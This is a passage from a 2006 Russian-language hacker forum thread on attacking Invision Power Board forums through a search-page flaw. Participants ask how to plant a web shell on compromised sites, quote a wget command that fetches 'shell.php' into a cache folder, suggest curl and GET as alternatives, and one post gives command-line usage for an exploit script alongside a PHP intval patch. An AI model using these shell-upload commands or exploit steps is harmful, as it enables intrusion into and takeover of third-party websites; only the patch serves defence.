ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 29.04.2006, 17:24
Аватар для karapuz
karapuz
Новичок
Регистрация: 06.03.2005
Сообщений: 16
Провел на форуме:
21674

Репутация: 2
По умолчанию

вот теперь другая трабла, как шелл залить?

wget http://www.шелл/shell.php -P /cache/

не помогло, показывается html код какойто...
права записи на папки есть
 

  #42  
Старый 29.04.2006, 20:05
Аватар для tester
tester
Новичок
Регистрация: 18.07.2005
Сообщений: 10
Провел на форуме:
32107

Репутация: 0
По умолчанию

Search Message ...[ FAILED ] - chto za poisk soob4enija? ktonibut razbiralsja?

Последний раз редактировалось tester; 29.04.2006 в 20:36..
 

  #43  
Старый 29.04.2006, 20:49
Аватар для Utochka
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

tester - читай внимательно эту тему! тут все уже сказали
 

  #44  
Старый 29.04.2006, 22:12
Аватар для dasNICK
dasNICK
Новичок
Регистрация: 28.02.2006
Сообщений: 21
Провел на форуме:
125991

Репутация: 0
По умолчанию

wget не пашет.. Кто залил шелл ?
 

  #45  
Старый 29.04.2006, 22:31
Аватар для Utochka
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

Цитата:
wget не пашет.. Кто залил шелл ?
Есть еще и другие качалки GET CURL и тд.
 

  #46  
Старый 29.04.2006, 22:38
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Ребят, прекращаем оффтопить. Комманды типа wget, это уже не по сабжу. Смотрим в соответствующем разделе.
__________________
Full DNS report
 

  #47  
Старый 29.04.2006, 23:23
Аватар для Dark Ne0
Dark Ne0
Новичок
Регистрация: 29.04.2006
Сообщений: 7
Провел на форуме:
19402

Репутация: 0
По умолчанию

Полное руководство по применению сплоя :-)))
Способ применения:
Регимся на сайте
C://ex.pl -h www.host.ru -d forum -l Dark Ne0 -p pass -f 2 -v 2.1.*
-d Указываем директорию где находится форум
-l ваш логин
-p ваш пасс
-f номер форума где экс может создать тему
-v версия форума
Способ защиты:
Заходим sources/search.php(sources/action_public/search.php
Было

{
$this->output = preg_replace( "#(value=[\"']{$ibforums->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}

Заменить на

{
$ibforums->input['lastdate'] = intval($ibforums->input['lastdate']);
$this->output = preg_replace( "#(value=[\"']{$ibforums->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}

Патча пока нет ))
Терь уверен все вопросы отпадут
 

  #48  
Старый 29.04.2006, 23:28
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Да и помним, что запуская не чищеный сплойт ты отдаешь этот шелл в руки РСТ.
 

  #49  
Старый 30.04.2006, 00:06
Аватар для Dark Ne0
Dark Ne0
Новичок
Регистрация: 29.04.2006
Сообщений: 7
Провел на форуме:
19402

Репутация: 0
По умолчанию

Но все равно отследить взломщика по запросу не составит труда !!!
Так что лучше с начала подумать что ломать
 

  #50  
Старый 30.04.2006, 00:25
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

я так и не понял как убрать шифровку,помогите.
Спасибо!
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Форумы 19 18.11.2006 09:19
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Эксплоит для Invision Power Board v2.1.3? xdx Форумы 8 08.02.2006 22:56
Invision Power Board <= 1.3.1 Login.PHP SQL Injection Как пользоваться? GrisS Форумы 16 02.02.2006 16:00
Вопрос про заливку шелла в Invision Power Board DiNo Форумы 14 03.03.2005 13:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ